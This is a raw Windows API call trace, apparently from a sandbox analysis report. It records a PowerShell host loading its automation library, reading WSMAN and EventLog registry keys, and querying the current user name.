	[0603.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0603.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ed0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0605.317] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.317] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.318] CoTaskMemFree (pv=0x40a230) 
	[0605.319] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.319] CoTaskMemFree (pv=0x40a230) 
	[0605.321] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.321] CoTaskMemFree (pv=0x40a230) 
	[0605.322] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.322] CoTaskMemFree (pv=0x40a230) 
	[0605.330] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.330] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.330] CoTaskMemFree (pv=0x40a230) 
	[0605.335] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.335] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.335] CoTaskMemFree (pv=0x40a230) 
	[0605.336] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0605.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0605.336] CoTaskMemFree (pv=0x40a230) 
	[0605.340] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed318 | out: phkResult=0x1ed318*=0x324) returned 0x0
	[0605.341] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed21c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed218, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed21c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed218*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0605.342] CoTaskMemFree (pv=0x0) 
	[0605.342] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0605.342] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3a21e0, lpcchValueName=0x1ed2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ed2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0605.342] CoTaskMemFree (pv=0x3a21e0) 
	[0605.342] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0605.342] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3a21e0, lpcchValueName=0x1ed2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ed2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0605.342] CoTaskMemFree (pv=0x3a21e0) 
	[0605.342] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0605.342] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x3a21e0, lpcchValueName=0x1ed2c8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ed2c8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0605.342] CoTaskMemFree (pv=0x3a21e0) 
	[0605.343] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed2ac, lpData=0x0, lpcbData=0x1ed2a8*=0x0 | out: lpType=0x1ed2ac*=0x1, lpData=0x0, lpcbData=0x1ed2a8*=0x8) returned 0x0
	[0605.343] CoTaskMemAlloc (cb=0xc) returned 0x41a420
	[0605.343] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed27c, lpData=0x41a420, lpcbData=0x1ed278*=0x8 | out: lpType=0x1ed27c*=0x1, lpData="2.0", lpcbData=0x1ed278*=0x8) returned 0x0
	[0605.343] CoTaskMemFree (pv=0x41a420) 
	[0606.372] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed268 | out: phkResult=0x1ed268*=0x324) returned 0x0
	[0606.372] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed16c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed168*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0606.372] CoTaskMemFree (pv=0x0) 
	[0606.372] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0606.372] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x3a21e0, lpcchValueName=0x1ed218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ed218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0606.372] CoTaskMemFree (pv=0x3a21e0) 
	[0606.372] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0606.372] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x3a21e0, lpcchValueName=0x1ed218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ed218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0606.372] CoTaskMemFree (pv=0x3a21e0) 
	[0606.373] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0606.373] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x3a21e0, lpcchValueName=0x1ed218, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ed218, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0606.373] CoTaskMemFree (pv=0x3a21e0) 
	[0606.373] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed1fc, lpData=0x0, lpcbData=0x1ed1f8*=0x0 | out: lpType=0x1ed1fc*=0x1, lpData=0x0, lpcbData=0x1ed1f8*=0x8) returned 0x0
	[0606.373] CoTaskMemAlloc (cb=0xc) returned 0x41a460
	[0606.373] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ed1cc, lpData=0x41a460, lpcbData=0x1ed1c8*=0x8 | out: lpType=0x1ed1cc*=0x1, lpData="2.0", lpcbData=0x1ed1c8*=0x8) returned 0x0
	[0606.373] CoTaskMemFree (pv=0x41a460) 
	[0606.374] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0606.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0606.374] CoTaskMemFree (pv=0x40a230) 
	[0607.378] CoTaskMemAlloc (cb=0x104) returned 0x40a230
	[0607.378] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x40a230, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0607.378] CoTaskMemFree (pv=0x40a230) 
	[0607.383] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed298 | out: phkResult=0x1ed298*=0x2f4) returned 0x0
	[0607.388] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed20c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed208, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed20c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed208*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.388] CoTaskMemFree (pv=0x0) 
	[0607.389] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.389] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x0, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.389] CoTaskMemFree (pv=0x3a21e0) 
	[0607.389] CoTaskMemFree (pv=0x0) 
	[0607.389] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.389] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x1, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.389] CoTaskMemFree (pv=0x3a21e0) 
	[0607.389] CoTaskMemFree (pv=0x0) 
	[0607.390] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.390] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x2, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.390] CoTaskMemFree (pv=0x3a21e0) 
	[0607.390] CoTaskMemFree (pv=0x0) 
	[0607.390] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.390] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x3, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.390] CoTaskMemFree (pv=0x3a21e0) 
	[0607.390] CoTaskMemFree (pv=0x0) 
	[0607.390] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.390] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x4, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.390] CoTaskMemFree (pv=0x3a21e0) 
	[0607.390] CoTaskMemFree (pv=0x0) 
	[0607.390] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.390] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x5, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.390] CoTaskMemFree (pv=0x3a21e0) 
	[0607.390] CoTaskMemFree (pv=0x0) 
	[0607.390] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.390] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x6, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.391] CoTaskMemFree (pv=0x3a21e0) 
	[0607.391] CoTaskMemFree (pv=0x0) 
	[0607.391] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.391] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x7, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.391] CoTaskMemFree (pv=0x3a21e0) 
	[0607.391] CoTaskMemFree (pv=0x0) 
	[0607.391] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0607.391] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x8, lpName=0x3a21e0, lpcchName=0x1ed298, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed298, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0607.391] CoTaskMemFree (pv=0x3a21e0) 
	[0607.391] CoTaskMemFree (pv=0x0) 
	[0607.391] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x2f8) returned 0x0
	[0607.391] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.391] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x2fc) returned 0x0
	[0607.391] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.392] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x314) returned 0x0
	[0607.392] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.392] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x2e4) returned 0x0
	[0607.392] RegOpenKeyExW (in: hKey=0x2e4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.392] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x2e8) returned 0x0
	[0607.392] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.392] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x328) returned 0x0
	[0607.392] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.392] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x32c) returned 0x0
	[0607.392] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.393] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x330) returned 0x0
	[0607.393] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x0) returned 0x2
	[0607.393] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x334) returned 0x0
	[0607.393] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2f8 | out: phkResult=0x1ed2f8*=0x338) returned 0x0
	[0607.393] RegCloseKey (hKey=0x338) returned 0x0
	[0607.393] RegCloseKey (hKey=0x2f4) returned 0x0
	[0607.394] RegCloseKey (hKey=0x334) returned 0x0
	[0607.405] CoTaskMemAlloc (cb=0x804) returned 0x1b9d7060
	[0607.405] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b9d7060, nSize=0x1ed508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ed508) returned 0x1
	[0608.328] CoTaskMemFree (pv=0x1b9d7060) 
	[0608.329] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0608.329] GetUserNameW (in: lpBuffer=0x3a21e0, pcbBuffer=0x1ed548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ed548) returned 1
	[0608.330] CoTaskMemFree (pv=0x3a21e0) 
	[0609.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed248 | out: phkResult=0x1ed248*=0x33c) returned 0x0
	[0609.603] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ed1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ed1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ed1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.603] CoTaskMemFree (pv=0x0) 
	[0609.603] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.603] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.603] CoTaskMemFree (pv=0x3a21e0) 
	[0609.603] CoTaskMemFree (pv=0x0) 
	[0609.603] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.603] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.604] CoTaskMemFree (pv=0x3a21e0) 
	[0609.604] CoTaskMemFree (pv=0x0) 
	[0609.604] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.604] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.604] CoTaskMemFree (pv=0x3a21e0) 
	[0609.604] CoTaskMemFree (pv=0x0) 
	[0609.604] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.604] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.604] CoTaskMemFree (pv=0x3a21e0) 
	[0609.604] CoTaskMemFree (pv=0x0) 
	[0609.604] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.604] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.604] CoTaskMemFree (pv=0x3a21e0) 
	[0609.604] CoTaskMemFree (pv=0x0) 
	[0609.604] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.604] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.604] CoTaskMemFree (pv=0x3a21e0) 
	[0609.604] CoTaskMemFree (pv=0x0) 
	[0609.604] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.604] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.605] CoTaskMemFree (pv=0x3a21e0) 
	[0609.605] CoTaskMemFree (pv=0x0) 
	[0609.605] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.605] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.605] CoTaskMemFree (pv=0x3a21e0) 
	[0609.605] CoTaskMemFree (pv=0x0) 
	[0609.605] CoTaskMemAlloc (cb=0x204) returned 0x3a21e0
	[0609.605] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x3a21e0, lpcchName=0x1ed248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ed248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.605] CoTaskMemFree (pv=0x3a21e0) 
	[0609.605] CoTaskMemFree (pv=0x0) 
	[0609.605] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x340) returned 0x0
	[0609.605] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.606] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x344) returned 0x0
	[0609.606] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.606] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x348) returned 0x0
	[0609.606] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.606] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x34c) returned 0x0
	[0609.606] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.606] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x350) returned 0x0
	[0609.606] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.606] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x354) returned 0x0
	[0609.607] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.607] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x358) returned 0x0
	[0609.607] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.607] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x35c) returned 0x0
	[0609.607] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x0) returned 0x2
	[0609.607] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x360) returned 0x0
	[0609.607] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed2a8 | out: phkResult=0x1ed2a8*=0x364) returned 0x0
